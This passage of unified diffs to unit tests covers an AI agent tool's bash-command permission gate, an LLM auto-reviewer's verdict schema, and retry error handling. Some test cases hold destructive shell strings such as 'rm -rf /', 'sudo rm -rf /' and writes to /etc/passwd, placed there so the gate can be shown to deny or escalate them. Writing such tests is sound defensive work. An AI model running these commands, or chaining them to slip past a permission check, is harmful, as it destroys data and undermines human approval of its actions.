-    def test_flag_does_not_leak_across_model_families(self):
-        """Prefix matching must not let a 5-family entry disable 4.x."""
-        specs = {"claude-sonnet-5": {"supports_temperature": False}}
-        assert self._generate_kwargs("claude-sonnet-4-6", specs)["temperature"] == 0.7
+    def test_other_providers_keep_an_explicit_value(self):
+        assert self._generate_kwargs("deepseek", temperature=0.5)["temperature"] == 0.5
 
-    def test_numeric_spec_is_not_read_as_a_capability_flag(self):
-        """``bool`` is an ``int`` subclass; the reverse must not hold."""
-        model = _make_model(_make_model_config(model="m"))
-        with patch("datus.models.openai_compatible._load_model_specs", return_value={"m": {"supports_temperature": 1}}):
-            assert model.supports_temperature() is True
+    def test_claude_5_models_are_selectable_from_the_catalog(self):
+        """The fix is unreachable through ``/model`` if the catalog omits them."""
+        import yaml
 
-    def test_real_catalog_marks_the_claude_5_family(self):
-        """The shipped providers.yml must carry the verified entries."""
-        from datus.models.openai_compatible import _load_model_specs
+        from datus.utils.resource_utils import read_data_file_text
 
-        specs = _load_model_specs()
-        assert specs["claude-sonnet-5"]["supports_temperature"] is False
-        assert specs["claude-opus-5"]["supports_temperature"] is False
-        assert "supports_temperature" not in specs["claude-sonnet-4-6"]
+        catalog = yaml.safe_load(read_data_file_text("conf/providers.yml"))
+        models = catalog["providers"]["claude"]["models"]
+        assert "claude-sonnet-5" in models
+        assert "claude-opus-5" in models

--- a/tests/unit_tests/models/test_openai_compatible_retry.py
+++ b/tests/unit_tests/models/test_openai_compatible_retry.py
@@ -193,3 +193,52 @@ class TestRetryErrorLoggingIncludesUpstream:
         msg = final_error_records[-1].getMessage()
         assert "text generation" in msg
         assert upstream in msg
+
+
+class TestRetryExceptionCarriesUpstream:
+    """The raised exception — not just the log — must name the real cause.
+
+    Regression: the final ``raise DatusException(error_code)`` dropped the
+    upstream text, so whoever catches it (the CLI's error line, the permission
+    reviewer's fail-closed warning) reported only the generic wrapper
+    description. An Anthropic ``temperature`` rejection and an unparseable
+    response were indistinguishable at the catch site.
+    """
+
+    def test_sync_retry_exception_includes_upstream_message(self, mock_model):
+        upstream = "`temperature` is deprecated for this model."
+
+        def always_fails():
+            raise _make_api_error(upstream)
+
+        with patch("time.sleep"):
+            with pytest.raises(DatusException) as exc_info:
+                mock_model._with_retry(always_fails, operation_name="text generation", max_retries=0)
+
+        assert upstream in str(exc_info.value)
+
+    def test_sync_retry_exception_keeps_the_error_code(self, mock_model):
+        """The classification must survive alongside the appended detail."""
+
+        def always_fails():
+            raise _make_api_error("bad request: something specific")
+
+        with patch("time.sleep"):
+            with pytest.raises(DatusException) as exc_info:
+                mock_model._with_retry(always_fails, operation_name="op", max_retries=0)
+
+        assert exc_info.value.code.code in str(exc_info.value)
+        assert "something specific" in str(exc_info.value)
+
+    @pytest.mark.asyncio
+    async def test_async_retry_exception_includes_upstream_message(self, mock_model):
+        upstream = "`temperature` is deprecated for this model."
+
+        async def always_fails():
+            raise _make_api_error(upstream)
+
+        with patch("asyncio.sleep", new=AsyncMock()):
+            with pytest.raises(DatusException) as exc_info:
+                await mock_model._with_retry_async(always_fails, operation_name="op", max_retries=0)
+
+        assert upstream in str(exc_info.value)

--- a/tests/unit_tests/tools/func_tool/test_bash_tool.py
+++ b/tests/unit_tests/tools/func_tool/test_bash_tool.py
@@ -196,6 +196,21 @@ class TestBashToolPatternMatching:
         # continues to pass after the bypass fix.
         assert python_tool._is_command_allowed("python scripts/ok.py") is True
 
+    @pytest.mark.parametrize("op", ["&&", "||", ";", "&"])
+    def test_chained_commands_still_rejected(self, python_tool, op):
+        """The restrictive whitelist is a separate trust boundary.
+
+        The permission layer judges ``a && b`` per sub-command, but this
+        execution-layer whitelist deliberately keeps using ``split_pipeline``
+        (pipes only) and must reject every other chaining operator outright,
+        even when both halves match a pattern.
+        """
+        command = f"python scripts/ok.py {op} python scripts/other.py"
+        assert python_tool._is_command_allowed(command) is False
+
+    def test_pure_pipeline_of_allowed_segments_is_still_permitted(self, wildcard_tool):
+        assert wildcard_tool._is_command_allowed("python a.py | python b.py") is True
+
 
 class TestBashToolExecution:
     def test_execute_allowed_command(self, python_tool):

--- a/tests/unit_tests/tools/permission/test_auto_reviewer.py
+++ b/tests/unit_tests/tools/permission/test_auto_reviewer.py
@@ -389,6 +389,25 @@ class TestBashAutoReview:
 
     @pytest.mark.asyncio
     async def test_safety_forced_command_is_reviewed(self):
+        """The reviewer sees the full text of a safety-ceiling command.
+
+        ``&&`` alone no longer forces the ceiling (each sub-command is judged
+        on its own), so this uses command substitution — a construct the argv
+        rules genuinely cannot decompose.
+        """
+        broker = MagicMock()
+        broker.request = AsyncMock()
+        reviewer = StubReviewer(verdict("low"))
+        hooks, _ = hooks_for("auto", reviewer, broker)
+
+        await hooks.on_tool_start(context({"command": "git status && echo $(id)"}), MagicMock(), tool("bash"))
+
+        assert reviewer.requests[0][0].static_assessment["safety_forced"] is True
+        broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_fully_allow_listed_chain_never_reaches_the_reviewer(self):
+        """Static per-sub-command ALLOW short-circuits before any model call."""
         broker = MagicMock()
         broker.request = AsyncMock()
         reviewer = StubReviewer(verdict("low"))
@@ -396,7 +415,7 @@ class TestBashAutoReview:
 
         await hooks.on_tool_start(context({"command": "git status && git diff"}), MagicMock(), tool("bash"))
 
-        assert reviewer.requests[0][0].static_assessment["safety_forced"] is True
+        assert reviewer.requests == []
         broker.request.assert_not_called()
 
     @pytest.mark.asyncio

--- a/tests/unit_tests/tools/permission/test_auto_reviewer.py
+++ b/tests/unit_tests/tools/permission/test_auto_reviewer.py
@@ -42,10 +42,12 @@ def verdict(risk="low", decision="allow", confidence=0.95):
     )
 
 
-def context(args, *, direct=False):
+def context(args, *, direct=False, call_id="call_1"):
     ctx = MagicMock()
     ctx.tool_arguments = json.dumps(args)
     ctx.direct_user_invocation = direct
+    # A real string, not a MagicMock: the gate keys review verdicts by this.
+    ctx.tool_call_id = call_id
     return ctx
 
 
@@ -537,3 +539,118 @@ class TestSqlAutoReview:
 
         event = broker.request.await_args.args[0][0]
         assert "`high` risk" in event.content
+
+
+class TestReviewHandoffToToolAction:
+    """The gate publishes its verdict so the tool action can display it."""
+
+    @pytest.fixture(autouse=True)
+    def _clean_registry(self):
+        from datus.tools.permission import review_registry
+
+        review_registry.clear()
+        yield
+        review_registry.clear()
+
+    @staticmethod
+    def _take(call_id="call_1"):
+        from datus.tools.permission import review_registry
+
+        return review_registry.take(call_id)
+
+    @pytest.mark.asyncio
+    async def test_auto_allowed_bash_publishes_the_verdict(self):
+        broker = MagicMock()
+        broker.request = AsyncMock()
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("low")), broker)
+
+        await hooks.on_tool_start(context({"command": "cargo build"}), MagicMock(), tool("bash"))
+
+        published = self._take()
+        assert published["outcome"] == "auto_allowed"
+        assert published["decision"] == "allow"
+        assert published["risk_level"] == "low"
+        assert published["rationale"] == "low test action"
+        broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_user_override_is_published_as_such(self):
+        """A flagged action the user approved must not read as a clean pass."""
+        broker = MagicMock()
+        broker.request = AsyncMock(return_value=[["y"]])
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("high", decision="ask")), broker)
+
+        await hooks.on_tool_start(context({"command": "cargo build"}), MagicMock(), tool("bash"))
+
+        published = self._take()
+        assert published["outcome"] == "user_approved"
+        assert published["decision"] == "ask"
+        assert published["risk_level"] == "high"
+
+    @pytest.mark.asyncio
+    async def test_denied_action_publishes_nothing(self):
+        broker = MagicMock()
+        broker.request = AsyncMock(return_value=[["n"]])
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("high", decision="ask")), broker)
+
+        with pytest.raises(PermissionDeniedException):
+            await hooks.on_tool_start(context({"command": "cargo build"}), MagicMock(), tool("bash"))
+
+        assert self._take() is None
+
+    @pytest.mark.asyncio
+    async def test_inconclusive_review_is_published_as_unavailable(self):
+        broker = MagicMock()
+        broker.request = AsyncMock(return_value=[["y"]])
+        hooks, _ = hooks_for("auto", StubReviewer(None), broker)
+
+        await hooks.on_tool_start(context({"command": "cargo build"}), MagicMock(), tool("bash"))
+
+        published = self._take()
+        assert published == {"outcome": "user_approved", "decision": "unavailable"}
+
+    @pytest.mark.asyncio
+    async def test_review_disabled_publishes_nothing(self):
+        """The CLI must never claim a review happened when none did."""
+        broker = MagicMock()
+        broker.request = AsyncMock(return_value=[["y"]])
+        hooks, _ = hooks_for("normal", StubReviewer(verdict("low")), broker)
+
+        await hooks.on_tool_start(context({"command": "cargo build"}), MagicMock(), tool("bash"))
+
+        assert self._take() is None
+
+    @pytest.mark.asyncio
+    async def test_statically_allowed_command_publishes_nothing(self):
+        """No review ran, so there is nothing to show on the tool action."""
+        broker = MagicMock()
+        broker.request = AsyncMock()
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("low")), broker)
+
+        await hooks.on_tool_start(context({"command": "git status"}), MagicMock(), tool("bash"))
+
+        assert self._take() is None
+
+    @pytest.mark.asyncio
+    async def test_auto_allowed_sql_publishes_the_verdict(self):
+        broker = MagicMock()
+        broker.request = AsyncMock()
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("medium")), broker)
+
+        await hooks.on_tool_start(context({"sql": "DELETE FROM t WHERE id = 1"}), MagicMock(), tool("execute_sql"))
+
+        published = self._take()
+        assert published["outcome"] == "auto_allowed"
+        assert published["risk_level"] == "medium"
+
+    @pytest.mark.asyncio
+    async def test_each_call_is_keyed_separately(self):
+        broker = MagicMock()
+        broker.request = AsyncMock()
+        hooks, _ = hooks_for("auto", StubReviewer(verdict("low")), broker)
+
+        await hooks.on_tool_start(context({"command": "cargo build"}, call_id="a"), MagicMock(), tool("bash"))
+        await hooks.on_tool_start(context({"command": "cargo test"}, call_id="b"), MagicMock(), tool("bash"))
+
+        assert self._take("a")["outcome"] == "auto_allowed"
+        assert self._take("b")["outcome"] == "auto_allowed"

--- a/tests/unit_tests/tools/permission/test_auto_reviewer.py
+++ b/tests/unit_tests/tools/permission/test_auto_reviewer.py
@@ -6,6 +6,7 @@ import threading
 from unittest.mock import AsyncMock, MagicMock, patch
 
 import pytest
+from pydantic import ValidationError
 
 from datus.configuration.agent_config import AgentConfig, ModelConfig
 from datus.tools.permission.auto_reviewer import (
@@ -13,6 +14,7 @@ from datus.tools.permission.auto_reviewer import (
     AutoReviewRequest,
     AutoReviewVerdict,
     LLMAutoReviewer,
+    ReviewDecision,
 )
 from datus.tools.permission.bash_rules import BashCommandRules
 from datus.tools.permission.permission_config import AutoReviewConfig, PermissionConfig
@@ -126,6 +128,86 @@ class TestAutoReviewConfig:
         assert verdict("medium").can_auto_allow(config)
         assert not verdict("high").can_auto_allow(config)
         assert not verdict("medium", confidence=0.5).can_auto_allow(config)
+
+
+class TestVerdictToleratesUnconstrainedOutput:
+    """Validation must be no stricter than the transport can guarantee.
+
+    Only schema-capable adapters constrain decoding; every Claude model routes
+    through ``generate_with_json_output``, which drops the schema kwarg and
+    asks Anthropic for a JSON *object*. The schema is a suggestion there, so a
+    constraint the model can violate is one that fails a usable review closed
+    into a manual prompt.
+    """
+
+    _REQUIRED = {
+        "risk_level": "low",
+        "user_authorization": "high",
+        "decision": "allow",
+        "confidence": 0.97,
+        "rationale": "reads a remote page, no mutation",
+    }
+
+    @pytest.mark.parametrize(
+        "extra_key,extra_value",
+        [
+            # Each observed in ~/.datus/logs — the reviewer answered correctly
+            # and volunteered one more field explaining or qualifying itself.
+            ("requires_confirmation", False),
+            ("user_authorization_reason", "matches trusted user message"),
+            ("confidence_note", ""),
+        ],
+    )
+    def test_volunteered_field_does_not_void_the_verdict(self, extra_key, extra_value):
+        result = AutoReviewVerdict.model_validate({**self._REQUIRED, extra_key: extra_value})
+
+        assert result.decision == ReviewDecision.ALLOW
+        assert result.confidence == 0.97
+        assert result.rationale == "reads a remote page, no mutation"
+
+    def test_volunteered_field_is_dropped_not_retained(self):
+        """Ignored means gone: nothing downstream can read a hallucinated key."""
+        result = AutoReviewVerdict.model_validate({**self._REQUIRED, "requires_confirmation": True})
+
+        assert "requires_confirmation" not in result.model_dump()
+        assert not hasattr(result, "requires_confirmation")
+
+    def test_a_missing_required_field_still_fails(self):
+        """Leniency covers additions only — an incomplete verdict is unusable."""
+        with pytest.raises(ValidationError):
+            AutoReviewVerdict.model_validate({k: v for k, v in self._REQUIRED.items() if k != "decision"})
+
+    def test_an_out_of_range_confidence_still_fails(self):
+        with pytest.raises(ValidationError):
+            AutoReviewVerdict.model_validate({**self._REQUIRED, "confidence": 1.5})
+
+    def test_an_unknown_decision_still_fails(self):
+        with pytest.raises(ValidationError):
+            AutoReviewVerdict.model_validate({**self._REQUIRED, "decision": "definitely"})
+
+    def test_a_long_rationale_survives_for_the_renderer_to_truncate(self):
+        """The display budget is ~70 chars; enforcing it here would fail closed."""
+        result = AutoReviewVerdict.model_validate({**self._REQUIRED, "rationale": "y" * 900})
+
+        assert len(result.rationale) == 900
+
+    def test_a_runaway_rationale_still_fails(self):
+        with pytest.raises(ValidationError):
+            AutoReviewVerdict.model_validate({**self._REQUIRED, "rationale": "y" * 1001})
+
+    def test_emitted_schema_still_forbids_extra_properties(self):
+        """The model must still be *told* not to add fields, and OpenAI's strict
+        json_schema mode rejects a schema without ``additionalProperties``."""
+        schema = AutoReviewVerdict.model_json_schema()
+
+        assert schema["additionalProperties"] is False
+
+    def test_emitted_schema_keeps_the_rationale_length_guidance(self):
+        """The schema is the only steer on the unconstrained path."""
+        rationale = AutoReviewVerdict.model_json_schema()["properties"]["rationale"]
+
+        assert "70 characters" in rationale["description"]
+        assert rationale["maxLength"] == 1000
 
 
 class TestReviewerRequest:

--- a/tests/unit_tests/tools/permission/test_bash_rules.py
+++ b/tests/unit_tests/tools/permission/test_bash_rules.py
@@ -187,19 +187,42 @@ class TestSafetyCeiling:
     @pytest.mark.parametrize(
         "command",
         [
-            "git status && rm -rf /",
-            "ls || rm x",  # logical OR is not a pipeline
-            "ls |& grep foo",  # stderr pipe is not a simple pipeline
-            "ls |",  # trailing empty pipeline segment
+            "ls |& grep foo",  # stderr pipe is not a simple pipe
+            "ls |",  # trailing empty segment
+            "ls & rm x",  # background `&` is not a sequencer
+            "ls &",
+            "ls;; rm x",  # empty segment between `;;`
             "echo hi > /etc/passwd",
             "echo `whoami`",
             "echo $(id)",
             "echo ${HOME}",
-            "ls; rm x",
+            "ls\nrm x",  # newline is not segmented
         ],
     )
     def test_metacharacters_force_ask(self, command):
         rules = BashCommandRules(allow=["git status", "ls:*", "echo:*", "grep:*", "rm:*"])
+        decision = evaluate_bash_command(command, rules)
+        assert decision.level == PermissionLevel.ASK
+        assert decision.source == BashDecisionSource.SAFETY
+        assert decision.safety_forced is True
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "for f in *; do echo $f; done",
+            "if ls; then echo ok; fi",
+            "while ls; do echo x; done",
+            "(cd /tmp; ls)",
+            "{ ls; echo done; }",
+        ],
+    )
+    def test_compound_constructs_force_ask(self, command):
+        """Loops/conditionals/subshells are not decomposable into sub-commands.
+
+        Without this guard ``do rm $f`` would be judged — and persisted — as an
+        ordinary ``rm`` command.
+        """
+        rules = BashCommandRules(allow=["ls:*", "echo:*", "cd:*", "rm:*"])
         decision = evaluate_bash_command(command, rules)
         assert decision.level == PermissionLevel.ASK
         assert decision.source == BashDecisionSource.SAFETY
@@ -429,19 +452,130 @@ class TestPipelineEvaluation:
         assert d.safety_forced is True
 
     def test_ask_pipeline_carries_all_non_allow_segments(self):
-        """The hook's project-grant bypass must see EVERY non-allow segment,
+        """The prompt and the grant writers must see EVERY non-allow segment,
         not just the representative one."""
         rules = BashCommandRules(allow=["cat:*"], ask=["docker:*"])
         d = evaluate_bash_command("frobnicate | docker ps | cat x", rules)
-        assert d.segment_ask_patterns == (
-            (BashDecisionSource.DEFAULT, None),
-            (BashDecisionSource.ASK_RULE, "docker:*"),
-        )
+        assert [(s.command, s.source, s.matched_pattern, s.bucket) for s in d.ask_segments] == [
+            ("frobnicate", BashDecisionSource.DEFAULT, None, "frobnicate"),
+            ("docker ps", BashDecisionSource.ASK_RULE, "docker:*", "docker:*"),
+        ]
 
-    def test_single_command_has_no_segment_patterns(self):
+    def test_single_command_carries_itself_as_one_ask_segment(self):
+        """Callers get one code path: a plain ASK still populates ask_segments."""
         rules = BashCommandRules(ask=["docker:*"])
         d = evaluate_bash_command("docker ps", rules)
-        assert d.segment_ask_patterns is None
+        assert len(d.ask_segments) == 1
+        seg = d.ask_segments[0]
+        assert seg.command == "docker ps"
+        assert seg.source == BashDecisionSource.ASK_RULE
+        assert seg.matched_pattern == "docker:*"
+        assert seg.bucket == "docker:*"
+        assert seg.safety_forced is False
+
+    def test_allow_and_deny_decisions_carry_no_ask_segments(self):
+        rules = BashCommandRules(allow=["ls:*"], deny=["rm:*"])
+        assert evaluate_bash_command("ls -la", rules).ask_segments == ()
+        assert evaluate_bash_command("rm -rf x", rules).ask_segments == ()
+
+
+class TestCommandChainSplitting:
+    """split_command_chain: top-level unquoted |, &&, ||, ; segmentation."""
+
+    @pytest.mark.parametrize(
+        "command,expected",
+        [
+            ("git status", ["git status"]),
+            ("a && b", ["a", "b"]),
+            ("a || b", ["a", "b"]),
+            ("a; b", ["a", "b"]),
+            ("a | b", ["a", "b"]),
+            ("a && b || c; d | e", ["a", "b", "c", "d", "e"]),
+            ('git commit -m "fix; bug"', ['git commit -m "fix; bug"']),
+            ("grep 'a && b' file", ["grep 'a && b' file"]),
+            ("echo a\\;b", ["echo a\\;b"]),
+            (r"find . -name '*.py' -exec ls {} \;", [r"find . -name '*.py' -exec ls {} \;"]),
+        ],
+    )
+    def test_segments(self, command, expected):
+        from datus.tools.permission.bash_rules import split_command_chain
+
+        assert split_command_chain(command) == expected
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "a |& b",  # stderr pipe
+            "ls &",  # background
+            "a & b",  # background
+            "ls &&",  # empty trailing segment
+            "; ls",  # empty leading segment
+            "a;; b",  # empty middle segment
+            'echo "unclosed && ls',  # unbalanced quotes
+        ],
+    )
+    def test_unsegmentable_returns_none(self, command):
+        from datus.tools.permission.bash_rules import split_command_chain
+
+        assert split_command_chain(command) is None
+
+    def test_split_pipeline_still_only_splits_pipes(self):
+        """The execution-layer whitelist (BashTool) must not be widened."""
+        from datus.tools.permission.bash_rules import split_pipeline
+
+        assert split_pipeline("a && b") == ["a && b"]
+        assert split_pipeline("a; b") == ["a; b"]
+        assert split_pipeline("a || b") is None
+        assert split_pipeline("a | b | c") == ["a", "b", "c"]
+
+
+class TestChainEvaluation:
+    """Per-sub-command judging for &&, ||, ; chains."""
+
+    @pytest.mark.parametrize("op", ["&&", "||", ";"])
+    def test_all_allow_sub_commands_auto_allow(self, op):
+        rules = BashCommandRules(allow=["git status", "ls:*"])
+        d = evaluate_bash_command(f"git status {op} ls -la", rules)
+        assert d.level == PermissionLevel.ALLOW
+        assert d.source == BashDecisionSource.ALLOW_RULE
+
+    @pytest.mark.parametrize("op", ["&&", "||", ";"])
+    def test_deny_sub_command_blocks_whole_chain(self, op):
+        rules = BashCommandRules(allow=["git status"], deny=["rm:*"])
+        d = evaluate_bash_command(f"git status {op} rm -rf /", rules)
+        assert d.level == PermissionLevel.DENY
+        assert d.matched_pattern == "rm:*"
+
+    def test_ask_chain_lists_every_non_allow_sub_command(self):
+        rules = BashCommandRules(allow=["git fetch"], ask=["npm:*"])
+        d = evaluate_bash_command("git fetch && rm -rf build && npm ci", rules)
+        assert d.level == PermissionLevel.ASK
+        assert [(s.command, s.source) for s in d.ask_segments] == [
+            ("rm -rf build", BashDecisionSource.DEFAULT),
+            ("npm ci", BashDecisionSource.ASK_RULE),
+        ]
+
+    def test_repeated_sub_commands_are_all_reported(self):
+        """Display fidelity: the user sees each occurrence, not a deduped one."""
+        rules = BashCommandRules()
+        d = evaluate_bash_command("rm a; rm b", rules)
+        assert [s.command for s in d.ask_segments] == ["rm a", "rm b"]
+
+    def test_safety_forced_sub_command_still_lists_the_others(self):
+        """The old short-circuit hid sibling sub-commands from the prompt."""
+        rules = BashCommandRules(allow=["git fetch"])
+        d = evaluate_bash_command("git fetch && sudo ls && npm ci", rules)
+        assert d.level == PermissionLevel.ASK
+        assert d.source == BashDecisionSource.SAFETY
+        assert d.safety_forced is True
+        assert [s.command for s in d.ask_segments] == ["sudo ls", "npm ci"]
+        assert [s.safety_forced for s in d.ask_segments] == [True, False]
+
+    def test_mixed_pipe_and_sequence_operators(self):
+        rules = BashCommandRules(allow=["cat:*", "grep:*"])
+        d = evaluate_bash_command("cat log | grep err && frobnicate", rules)
+        assert d.level == PermissionLevel.ASK
+        assert [s.command for s in d.ask_segments] == ["frobnicate"]
 
 
 class TestDatusProfileFlagNormalization:

--- a/tests/unit_tests/tools/permission/test_permission_hooks.py
+++ b/tests/unit_tests/tools/permission/test_permission_hooks.py
@@ -2329,8 +2329,14 @@ class TestPermissionPromptContent:
         assert "Permission Request" in event.content
 
 
-class TestBashCommandPermission:
-    """Command-level gating for ``bash_tools.bash`` via _handle_bash_permission."""
+class BashHooksMixin:
+    """Shared ``bash_tools.bash`` gate fixtures for the bash permission suites.
+
+    One copy of the builders instead of one per test class, so a
+    ``PermissionHooks`` constructor change lands in a single place. Every
+    keyword defaults to the value the classes were passing implicitly, so
+    inheriting is behaviour-preserving.
+    """
 
     def _make_hooks(
         self,
@@ -2382,6 +2388,10 @@ class TestBashCommandPermission:
         t = MagicMock()
         t.name = "bash"
         return t
+
+
+class TestBashCommandPermission(BashHooksMixin):
+    """Command-level gating for ``bash_tools.bash`` via _handle_bash_permission."""
 
     @pytest.mark.asyncio
     async def test_allow_rule_bypasses_prompt(self, mock_broker):
@@ -2735,46 +2745,8 @@ class TestBashDangerousProfileWithUserRules:
             await hooks.on_tool_start(self._ctx("touch x"), MagicMock(), self._tool())
 
 
-class TestBashPipelinePermission:
+class TestBashPipelinePermission(BashHooksMixin):
     """Hook-level behavior for pipelines under _handle_bash_permission."""
-
-    def _make_hooks(self, mock_broker, bash_commands=None, non_interactive=False):
-        from datus.tools.permission.bash_rules import BashCommandRules
-
-        registry = ToolRegistry()
-        tool_mock = MagicMock()
-        tool_mock.name = "bash"
-        registry.register_tools("bash_tools", [tool_mock])
-        config = PermissionConfig(
-            default_permission=PermissionLevel.ASK,
-            rules=[PermissionRule(tool="bash_tools", pattern="bash", permission=PermissionLevel.ASK)],
-            bash_commands=BashCommandRules(**bash_commands) if bash_commands else None,
-        )
-        manager = PermissionManager(global_config=config)
-        return (
-            PermissionHooks(
-                broker=mock_broker,
-                permission_manager=manager,
-                node_name="chat",
-                tool_registry=registry,
-                non_interactive=non_interactive,
-            ),
-            manager,
-        )
-
-    @staticmethod
-    def _ctx(command):
-        import json
-
-        ctx = MagicMock()
-        ctx.tool_arguments = json.dumps({"command": command})
-        return ctx
-
-    @staticmethod
-    def _tool():
-        t = MagicMock()
-        t.name = "bash"
-        return t
 
     @pytest.mark.asyncio
     async def test_all_allow_pipeline_no_prompt(self, mock_broker):
@@ -2819,47 +2791,8 @@ class TestBashPipelinePermission:
             await hooks.on_tool_start(self._ctx("cat x | frobnicate"), MagicMock(), self._tool())
 
 
-class TestBashChainedCommandPrompt:
+class TestBashChainedCommandPrompt(BashHooksMixin):
     """A chained command must be shown, approved and persisted per sub-command."""
-
-    def _make_hooks(self, mock_broker, bash_commands=None, project_root=None, config_mutable=True):
-        from datus.tools.permission.bash_rules import BashCommandRules
-
-        registry = ToolRegistry()
-        tool_mock = MagicMock()
-        tool_mock.name = "bash"
-        registry.register_tools("bash_tools", [tool_mock])
-        config = PermissionConfig(
-            default_permission=PermissionLevel.ASK,
-            rules=[PermissionRule(tool="bash_tools", pattern="bash", permission=PermissionLevel.ASK)],
-            bash_commands=BashCommandRules(**bash_commands) if bash_commands else None,
-        )
-        manager = PermissionManager(global_config=config)
-        return (
-            PermissionHooks(
-                broker=mock_broker,
-                permission_manager=manager,
-                node_name="chat",
-                tool_registry=registry,
-                project_root=project_root,
-                config_mutable=config_mutable,
-            ),
-            manager,
-        )
-
-    @staticmethod
-    def _ctx(command):
-        import json
-
-        ctx = MagicMock()
-        ctx.tool_arguments = json.dumps({"command": command})
-        return ctx
-
-    @staticmethod
-    def _tool():
-        t = MagicMock()
-        t.name = "bash"
-        return t
 
     @pytest.mark.asyncio
     async def test_prompt_body_lists_every_sub_command_needing_approval(self, mock_broker):

--- a/tests/unit_tests/tools/permission/test_permission_hooks.py
+++ b/tests/unit_tests/tools/permission/test_permission_hooks.py
@@ -2485,12 +2485,20 @@ class TestBashCommandPermission:
         assert mock_broker.request.await_count == 1
 
     @pytest.mark.asyncio
-    async def test_safety_forced_prompt_offers_no_project_choice(self, mock_broker):
-        """Wrapper/metachar asks must not offer the persistent 'p' choice."""
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "git status && sudo rm -rf /",  # wrapper sub-command
+            "git status && echo $(id)",  # command substitution
+            "git status & rm -rf /",  # background: not segmentable
+        ],
+    )
+    async def test_safety_forced_prompt_offers_no_project_choice(self, mock_broker, command):
+        """One safety-ceiling sub-command withholds 'p' from the whole chain."""
         hooks, _ = self._make_hooks(mock_broker, bash_commands={"allow": ["git status"]})
         mock_broker.request = AsyncMock(return_value=[["y"]])
 
-        await hooks.on_tool_start(self._ctx("git status && rm -rf /"), MagicMock(), self._tool())
+        await hooks.on_tool_start(self._ctx(command), MagicMock(), self._tool())
 
         event = mock_broker.request.await_args.args[0][0]
         assert "p" not in event.choices
@@ -2809,6 +2817,230 @@ class TestBashPipelinePermission:
 
         with pytest.raises(PermissionDeniedException):
             await hooks.on_tool_start(self._ctx("cat x | frobnicate"), MagicMock(), self._tool())
+
+
+class TestBashChainedCommandPrompt:
+    """A chained command must be shown, approved and persisted per sub-command."""
+
+    def _make_hooks(self, mock_broker, bash_commands=None, project_root=None, config_mutable=True):
+        from datus.tools.permission.bash_rules import BashCommandRules
+
+        registry = ToolRegistry()
+        tool_mock = MagicMock()
+        tool_mock.name = "bash"
+        registry.register_tools("bash_tools", [tool_mock])
+        config = PermissionConfig(
+            default_permission=PermissionLevel.ASK,
+            rules=[PermissionRule(tool="bash_tools", pattern="bash", permission=PermissionLevel.ASK)],
+            bash_commands=BashCommandRules(**bash_commands) if bash_commands else None,
+        )
+        manager = PermissionManager(global_config=config)
+        return (
+            PermissionHooks(
+                broker=mock_broker,
+                permission_manager=manager,
+                node_name="chat",
+                tool_registry=registry,
+                project_root=project_root,
+                config_mutable=config_mutable,
+            ),
+            manager,
+        )
+
+    @staticmethod
+    def _ctx(command):
+        import json
+
+        ctx = MagicMock()
+        ctx.tool_arguments = json.dumps({"command": command})
+        return ctx
+
+    @staticmethod
+    def _tool():
+        t = MagicMock()
+        t.name = "bash"
+        return t
+
+    @pytest.mark.asyncio
+    async def test_prompt_body_lists_every_sub_command_needing_approval(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git fetch"], "ask": ["npm:*"]})
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && npm ci"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        # The full command still renders verbatim in a bash fence...
+        assert "```bash\ngit fetch && rm -rf build && npm ci\n```" in event.content
+        # ...and each sub-command needing approval is named individually.
+        assert "2 sub-commands require confirmation" in event.content
+        assert "`rm -rf build`" in event.content
+        assert "`npm ci`" in event.content
+        # The allowed sub-command is not presented as needing approval.
+        assert "`git fetch`" not in event.content
+
+    @pytest.mark.asyncio
+    async def test_choice_labels_name_every_bucket_and_pattern(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git fetch"]}, project_root=None)
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        assert event.choices["a"] == "Allow 'rm', 'cargo test' (session)"
+        assert event.choices["p"] == "Allow 'rm:*', 'cargo test:*' (project)"
+
+    @pytest.mark.asyncio
+    async def test_long_chain_label_degrades_to_a_count(self, mock_broker):
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git log:*"]})
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("aa; bb; cc; dd"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        assert event.choices["a"] == "Allow all 4 sub-commands (session)"
+        # The body still enumerates them, so nothing is hidden by the short label.
+        for name in ("`aa`", "`bb`", "`cc`", "`dd`"):
+            assert name in event.content
+
+    @pytest.mark.asyncio
+    async def test_sub_command_with_backticks_stays_a_valid_code_span(self, mock_broker):
+        """``echo `whoami``` must not close its own inline code span."""
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git log:*"]})
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("frobnicate; echo `whoami`"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        # A two-backtick fence plus padding holds the backticks in the command.
+        assert "`` echo `whoami` ``" in event.content
+        assert "`frobnicate`" in event.content
+        # The safety-forced sub-command is named in full, matching the grant it
+        # actually creates (an exact-command key, not the ``echo`` bucket).
+        assert event.choices["a"] == "Allow 'frobnicate', 'echo `whoami`' (session)"
+
+    @pytest.mark.asyncio
+    async def test_single_sub_command_keeps_the_original_layout(self, mock_broker):
+        """Plain commands must not regress into the multi-sub-command rendering."""
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git log:*"]})
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
